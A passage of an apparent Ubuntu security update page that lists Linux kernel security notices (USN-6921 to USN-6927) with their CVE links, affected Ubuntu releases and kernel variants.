<li><a href="https://ubuntu.com/security/CVE-2024-35823">CVE-2024-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26743">CVE-2024-26743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26846">CVE-2024-26846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26811">CVE-2024-26811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26989">CVE-2024-26989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26642">CVE-2024-26642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26659">CVE-2024-26659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26766">CVE-2024-26766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27393">CVE-2024-27393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26859">CVE-2024-26859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35898">CVE-2024-35898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35893">CVE-2024-35893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52640">CVE-2023-52640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26795">CVE-2024-26795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27009">CVE-2024-27009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26791">CVE-2024-26791</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27043">CVE-2024-27043</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27051">CVE-2024-27051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26804">CVE-2024-26804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26878">CVE-2024-26878</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27030">CVE-2024-27030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27000">CVE-2024-27000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26777">CVE-2024-26777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35825">CVE-2024-35825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27415">CVE-2024-27415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27001">CVE-2024-27001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27004">CVE-2024-27004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26769">CVE-2024-26769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26816">CVE-2024-26816</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35807">CVE-2024-35807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35900">CVE-2024-35900</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35851">CVE-2024-35851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27052">CVE-2024-27052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35804">CVE-2024-35804</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35944">CVE-2024-35944</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35895">CVE-2024-35895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26897">CVE-2024-26897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27045">CVE-2024-27045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26814">CVE-2024-26814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26874">CVE-2024-26874</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35915">CVE-2024-35915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26820">CVE-2024-26820</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26603">CVE-2024-26603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26688">CVE-2024-26688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27054">CVE-2024-27054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26828">CVE-2024-26828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35857">CVE-2024-35857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52662">CVE-2023-52662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35989">CVE-2024-35989</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36005">CVE-2024-36005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35785">CVE-2024-35785</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27396">CVE-2024-27396</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35884">CVE-2024-35884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52650">CVE-2023-52650</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26882">CVE-2024-26882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26879">CVE-2024-26879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26898">CVE-2024-26898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27388">CVE-2024-27388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35879">CVE-2024-35879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35918">CVE-2024-35918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26585">CVE-2024-26585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35872">CVE-2024-35872</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52497">CVE-2023-52497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26778">CVE-2024-26778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26999">CVE-2024-26999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27046">CVE-2024-27046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52434">CVE-2023-52434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26862">CVE-2024-26862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26810">CVE-2024-26810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35796">CVE-2024-35796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35960">CVE-2024-35960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35969">CVE-2024-35969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26966">CVE-2024-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26856">CVE-2024-26856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35936">CVE-2024-35936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35955">CVE-2024-35955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26763">CVE-2024-26763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35806">CVE-2024-35806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27059">CVE-2024-27059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35855">CVE-2024-35855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36008">CVE-2024-36008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27075">CVE-2024-27075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52620">CVE-2023-52620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26931">CVE-2024-26931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35813">CVE-2024-35813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26788">CVE-2024-26788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27412">CVE-2024-27412</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26861">CVE-2024-26861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36004">CVE-2024-36004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26951">CVE-2024-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26903">CVE-2024-26903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26584">CVE-2024-26584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35877">CVE-2024-35877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26792">CVE-2024-26792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27416">CVE-2024-27416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27432">CVE-2024-27432</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26651">CVE-2024-26651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35852">CVE-2024-35852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35973">CVE-2024-35973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52656">CVE-2023-52656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26965">CVE-2024-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26969">CVE-2024-26969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26840">CVE-2024-26840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26817">CVE-2024-26817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27028">CVE-2024-27028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26752">CVE-2024-26752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27016">CVE-2024-27016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52641">CVE-2023-52641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35789">CVE-2024-35789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27078">CVE-2024-27078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26994">CVE-2024-26994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26629">CVE-2024-26629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26803">CVE-2024-26803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26977">CVE-2024-26977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35830">CVE-2024-35830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26957">CVE-2024-26957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36006">CVE-2024-36006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35817">CVE-2024-35817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26601">CVE-2024-26601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35845">CVE-2024-35845</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35897">CVE-2024-35897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27414">CVE-2024-27414</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26855">CVE-2024-26855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26877">CVE-2024-26877</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35829">CVE-2024-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35896">CVE-2024-35896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26875">CVE-2024-26875</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27405">CVE-2024-27405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26747">CVE-2024-26747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52644">CVE-2023-52644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26881">CVE-2024-26881</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26843">CVE-2024-26843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26926">CVE-2024-26926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26880">CVE-2024-26880</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26964">CVE-2024-26964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27044">CVE-2024-27044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26737">CVE-2024-26737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27431">CVE-2024-27431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26955">CVE-2024-26955</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26790">CVE-2024-26790</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26925">CVE-2024-26925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26838">CVE-2024-26838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26984">CVE-2024-26984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24861">CVE-2024-24861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23307">CVE-2024-23307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22099">CVE-2024-22099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21823">CVE-2024-21823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0841">CVE-2024-0841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-7042">CVE-2023-7042</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6270">CVE-2023-6270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38096">CVE-2022-38096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - Raspi</li>
</ul>
<h3 id="usn-6922-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6922-1">USN-6922-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.5 - NVIDIA</li>
</ul>
<h3 id="usn-6923-1-usn-6923-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6923-1">USN-6923-1</a>, <a href="https://ubuntu.com/security/notices/USN-6923-2">USN-6923-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27017">CVE-2024-27017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26952">CVE-2024-26952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25742">CVE-2024-25742</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 - generic, AWS, GCP, GKE, HWE, Intel-IOTG, KVM, LowLatency, NVIDIA, Oracle, IBM, Raspi</li>
</ul>
<h3 id="usn-6921-1-usn-6921-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6921-1">USN-6921-1</a>, <a href="https://ubuntu.com/security/notices/USN-6921-2">USN-6921-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36008">CVE-2024-36008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35992">CVE-2024-35992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35990">CVE-2024-35990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25742">CVE-2024-25742</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.8 - generic, AWS, GCP, GKE, IBM, NVIDIA, OEM, Raspi, LowLatency</li>
</ul>
<h3 id="usn-6924-1-usn-6924-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6924-1">USN-6924-1</a>, <a href="https://ubuntu.com/security/notices/USN-6924-2">USN-6924-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26583">CVE-2024-26583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48655">CVE-2022-48655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26907">CVE-2024-26907</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-47131">CVE-2021-47131</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26585">CVE-2024-26585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26584">CVE-2024-26584</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 - generic, AWS, Azure, Bluefield, GCP, GKE, HWE, IBM, IOT, KVM, Raspi, Xilinx-ZynqMP</li>
</ul>
<h3 id="usn-6925-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6925-1">USN-6925-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26882">CVE-2024-26882</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3.13 - generic, lowlatency, server, virtual</li>
</ul>
<h3 id="usn-6926-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6926-1">USN-6926-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>30 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26882">CVE-2024-26882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26934">CVE-2024-26934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26840">CVE-2024-26840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27020">CVE-2024-27020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26923">CVE-2024-26923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26857">CVE-2024-26857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36902">CVE-2024-36902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35982">CVE-2024-35982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35978">CVE-2024-35978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26901">CVE-2024-26901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26884">CVE-2024-26884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35997">CVE-2024-35997</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52620">CVE-2023-52620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35984">CVE-2024-35984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27013">CVE-2024-27013</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25744">CVE-2024-25744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25739">CVE-2024-25739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24859">CVE-2024-24859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24858">CVE-2024-24858</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24857">CVE-2024-24857</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46343">CVE-2023-46343</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 - generic, AWS, HWE, GCP, KVM, Oracle</li>
</ul>
<h3 id="usn-6927-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6927-1">USN-6927-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>161 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-27008">CVE-2024-27008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26951">CVE-2024-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26970">CVE-2024-26970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35815">CVE-2024-35815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26828">CVE-2024-26828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35898">CVE-2024-35898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26999">CVE-2024-26999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35938">CVE-2024-35938</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27016">CVE-2024-27016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35825">CVE-2024-35825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35950">CVE-2024-35950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26969">CVE-2024-26969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26643">CVE-2024-26643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26924">CVE-2024-26924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36025">CVE-2024-36025</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35936">CVE-2024-35936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35847">CVE-2024-35847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26964">CVE-2024-26964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35857">CVE-2024-35857</a> <!-- raw HTML omitted --></li>
